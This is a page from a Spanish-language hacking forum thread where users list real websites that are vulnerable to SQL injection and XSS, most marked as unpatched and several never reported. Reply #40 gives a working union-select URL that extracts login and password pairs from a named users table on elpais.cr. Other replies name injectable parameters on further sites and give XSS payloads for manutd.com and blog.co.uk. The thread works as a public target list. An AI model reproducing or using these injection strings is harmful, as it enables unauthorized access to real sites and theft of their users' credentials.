elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.


 


Tema destacado: 4n4lDetector v1.3: herramienta de análisis estático de malware


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Bugs y Exploits
| | |-+  Nivel Web (Moderadores: sirdarckcat, WHK)
| | | |-+  Recopilatorio de Vulnerabilidades de XSS/SQLinjection
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: 1 2 3 4 [5] 6 Ir Abajo Respuesta Imprimir
Autor Tema: Recopilatorio de Vulnerabilidades de XSS/SQLinjection  (Leído 61,432 veces)
franco_tuv

Desconectado Desconectado

Mensajes: 5



Ver Perfil
Re: Recopilatorio de Vulnerabilidades de XSS/SQLinjection
« Respuesta #40 en: 23 Julio 2011, 18:27 »

Sitio web: http://www.elpais.cr
Descubridor: franco_tuv
Fecha de descubrimiento: 22 de Julio del 2011
Fecha de notificación: 22 de Julio del 2011
Fecha de publicación: 23 de Julio del 2011
Arreglado : No
Información adicional:
Código:
SQLI
http://www.elpais.cr/galerias.php?id=-1+union+select+1,group_concat%28login,0x3a,password%29+from+406060_elpais.usuarios--
En línea

daryo


Desconectado Desconectado

Mensajes: 1.073



Ver Perfil WWW
Re: Recopilatorio de Vulnerabilidades de XSS/SQLinjection
« Respuesta #41 en: 13 Mayo 2013, 14:19 »

Sitio web: http://rebelion.org
Descubridor: daryo
Fecha de descubrimiento: 12 mayo 2012
Fecha de notificación: xxxxx
Fecha de publicación: xxxx
Arreglado : No
Información adicional:
Citar

PD:reviviendo el post XD
En línea

daryo


Desconectado Desconectado

Mensajes: 1.073



Ver Perfil WWW
Re: Recopilatorio de Vulnerabilidades de XSS/SQLinjection
« Respuesta #42 en: 13 Mayo 2013, 14:21 »

Sitio web: http://www.szkolamarzen.pl
Descubridor: daryo
Fecha de descubrimiento: 20 mayo 2012
Fecha de notificación: xxxxx
Fecha de publicación: xxxx
Arreglado : No
Información adicional:

Código:
sqli
http://www.szkolamarzen.pl/gim/newsone.php?id=
En línea

daryo


Desconectado Desconectado

Mensajes: 1.073



Ver Perfil WWW
Re: Recopilatorio de Vulnerabilidades de XSS/SQLinjection
« Respuesta #43 en: 13 Mayo 2013, 14:24 »

Sitio web: http://www.worstpreviews.com
Descubridor: daryo
Fecha de descubrimiento: la verdad ni recuerdo
Fecha de notificación: xxxxx
Fecha de publicación: xxxx
Arreglado : No
Información adicional:
Código:
sqli
http://www.worstpreviews.com/review.php?id=600
En línea

daryo


Desconectado Desconectado

Mensajes: 1.073



Ver Perfil WWW
Re: Recopilatorio de Vulnerabilidades de XSS/SQLinjection
« Respuesta #44 en: 13 Mayo 2013, 14:31 »


Insertar Cita
Sitio web: http://www.eventdirect.ca
Descubridor: seguro alguien antes que yo :P
Fecha de descubrimiento: la verdad ni recuerdo
Fecha de notificación: xxxxx
Fecha de publicación: xxxx
Arreglado : No
Información adicional:
Código:
Código:
sqli
http://www.eventdirect.ca/game.php?ID=62
« Última modificación: 13 Mayo 2013, 14:35 por daryo » En línea

cachacko

Desconectado Desconectado

Mensajes: 4


Ver Perfil
Re: Recopilatorio de Vulnerabilidades de XSS/SQLinjection
« Respuesta #45 en: 9 Septiembre 2013, 04:53 »




Nunca he visto esto. Muy interesante.



En línea

Socket

Desconectado Desconectado

Mensajes: 4



Ver Perfil
Re: Recopilatorio de Vulnerabilidades de XSS/SQLinjection
« Respuesta #46 en: 9 Septiembre 2013, 07:07 »

bien hay
En línea

Tatsurou_LuLu

Desconectado Desconectado

Mensajes: 22


Un libro es la mejor arma contra la ignorancia


Ver Perfil
Re: Recopilatorio de Vulnerabilidades de XSS/SQLinjection
« Respuesta #47 en: 4 Mayo 2014, 23:50 »

Sitio web:http://www.espanol.manutd.com/
Descubridor:The BlacK DiamOnD
URL del aviso: --
Fecha de descubrimiento: 2013
Fecha de notificación:24/11/13
Fecha de publicación: --
Arreglado: Si
Vulnerabilidad: XSS
Información adicional:Aunque Esta vulnerabilidad haya sido supuesta mente arreglada,aun sigue existiendo solo que incluyendo código HTML en vez de javascript.

Código
  1. <script>alert("XSS");</script>
&
Código
  1. <h1>xss</h1>
« Última modificación: 5 Mayo 2014, 01:56 por Tatsurou_LuLu » En línea

Tatsurou_LuLu

Desconectado Desconectado

Mensajes: 22


Un libro es la mejor arma contra la ignorancia


Ver Perfil
Re: Recopilatorio de Vulnerabilidades de XSS/SQLinjection
« Respuesta #48 en: 5 Mayo 2014, 01:53 »

Sitio web:http://blog.com.es/
Descubridor:The Black DiamOnD
URL del aviso:http://bugs.blog.co.uk/2014/05/04/html-xss-bug-18373598/
Fecha de descubrimiento: 04/05/2014
Fecha de notificación:04/05/2014
Fecha de publicación:04/05/2014
Arreglado: --
Vulnerabilidad: XSS reflejado
Informacion adicional:Blog Personal

Código:
http://support.blog.co.uk/search/%253Ch1%253EHOLA%2BMUNDO%253C%252Fh1%253E/AND/
« Última modificación: 5 Mayo 2014, 01:57 por Tatsurou_LuLu » En línea

Ceh

Desconectado Desconectado

Mensajes: 9


Ver Perfil
Re: Recopilatorio de Vulnerabilidades de XSS/SQLinjection
« Respuesta #49 en: 12 Junio 2014, 08:30 »



PETROLERA MAS POPULAR EN PERU

BY Security : Peruano y Muy PICHULON  ;D
En línea

Páginas: 1 2 3 4 [5] 6 Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
como saltarse un maxlenght para SQLinjection...
Bugs y Exploits
tornar 7 3,585 Último mensaje 19 Abril 2006, 23:05
por Rentero
Como hacer update en SQLinjection
Nivel Web
BlackHKR 6 4,380 Último mensaje 12 Mayo 2010, 20:55
por BHK
Duda SQLinjection en information_schema « 1 2 »
Nivel Web
miguelskk 10 4,479 Último mensaje 17 Julio 2010, 01:46
por TapIt
AYUDA:Captura de paquetes con Wireshark para herramienta SQLinjection
Hacking Básico
NetStorm 1 1,866 Último mensaje 5 Octubre 2011, 00:06
por alpha015
SQLInjection sin acceso a information_schema
Nivel Web
buggy_man 3 1,741 Último mensaje 11 Agosto 2012, 07:17
por afdlkglfgfdgfhgf
Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines